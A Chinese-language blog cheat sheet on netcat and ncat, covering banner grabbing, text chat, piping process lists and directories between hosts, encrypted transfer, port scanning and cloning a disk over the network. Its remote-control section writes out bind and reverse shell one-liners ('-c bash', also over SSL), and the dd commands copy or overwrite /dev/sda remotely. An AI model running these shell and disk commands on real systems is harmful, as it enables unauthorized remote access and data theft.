ncat瑞士军刀

作者: lincso | 来源:发表于2020-02-17 19:09 被阅读0次

    查看头文件

    nc -nv 0.0.0.0 IP地址 80 端口号(类telnet功能)
    head /
    

    聊天功能(传输是明文)
    nc相互传输文本信息(两台电脑实现类聊天功能)

    A:nc -lp 4444(打开监听一个端口)
    B:nc -nv 0.0.0.0(目标IP) 4444
    

    电子取证

    文件收集
    nc -lp 4444 > ps.txt(将4444端口接受的信息直接传到ps.txt,可以当日志查看自己的端口是否有被入侵)
    ps aux | nc -nv 0.0.0.0 4444 -q 1(将进程信息发给4444端口一秒后退出)
    lsof(收集系统的所有打开文件的内容)
    
    收集目录(将文件进行打包)
    tar -cvf - sublime/ | nc -lp 333 -q 1(nc -lp 333 -q1<atr -cvf - sublime/)
    nc -nv 0.0.0.0 333 | tar -xvf -(nc -nv 0.0.0.0 333>tar -xvf -)
    

    加密传输文件

    nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > aaa.txt
    mcrypt --flush -Fbqd -a rijndael-256 -m ecb < aaa.txt | nc -nv 0.0.0.0 333 -q 1
    

    流媒体服务器

    cat 1.mp4 |  nc -lp 333
    nc -nv 0.0.0.0 333 | mplayer -vo x11 -cache 3000 -
    

    端口扫描

    nc -nvz 0.0.0.0 1-65535
    nc -nvzu 0.0.0.0 1-1024(查看1-1024的udp端口)
    

    远程克隆硬盘

    nc -lp 333 | dd of=/dev/sda
    dd if=/dev/sda | nc -nv 0.0.0.0 333 -q 1
    

    远程控制

    正向
    nc -lp 333 -c bash(Windows用cmd)
    nc -nv 0.0.0.0 333
    
    反向(在目标服务器开启可连端口执行nc就可以实现第二次访问)
    nc -lp 333
    nc -nv 0.0.0.0 333 -c bash
    -c bash 就是可获取本地的bash窗口(在哪里获取哪里的)
    

    ncat(由于nc是不加密的,明文传输容易被嗅探,我们也可以用ncat)

    建立远程连接(ssl加密)

    ncat -c bash --allow 0.0.0.0 -nvl 333 --ssl(--allow允许一个指定IP连接)
    ncat -nv 0.0.0.0 333 --ssl
    

    相关文章

      网友评论

        本文标题:ncat瑞士军刀

        本文链接:https://www.haomeiwen.com/subject/ecjifhtx.html